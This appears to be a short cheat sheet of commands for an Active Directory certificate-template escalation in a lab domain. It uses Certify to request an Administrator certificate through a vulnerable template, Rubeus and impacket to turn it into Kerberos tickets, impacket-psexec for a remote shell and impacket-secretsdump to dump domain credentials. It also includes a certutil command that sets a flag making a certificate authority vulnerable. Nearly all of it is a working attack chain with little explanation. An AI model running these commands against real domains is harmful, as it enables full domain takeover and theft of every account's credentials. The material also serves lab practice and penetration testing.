certutil -getreg policy\EditFlags
certify.exe find /vulnerable
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
.\\Certify.exe request /ca:DC01.test.local\\test-DC01-CA /template:Vuln-Cert /altname:Administrator
CA Name : DC01.test.local\\test-DC01-CA
Template Name : Vuln-Cert
copy output to a cert.pem
convert to a pfx openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
get a tgt for administrator .\\Rubeus.exe asktgt /user:Administrator /ptt /nowrap /certificate:cert.pfx
request service for it .\\rubeus.exe asktgs /nowrap /user:Administrator /service:cifs/dc01.test.local /ticket:<base64 here>
Rubeus whack, use impacket ⇒ base64 -d cifs.b64 > cifs.kirbi
⇒impacket-ticketConverter cifs.kirbi cifs.ccache
⇒ export KRB5CCNAME=cifs.ccache
impacket-psexec -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/[email protected]
impacket-secretsdump -just-dc -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/[email protected]
certutil -setreg policy\\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
https://www.petenetlive.com/KB/Article/0001128 (password abc)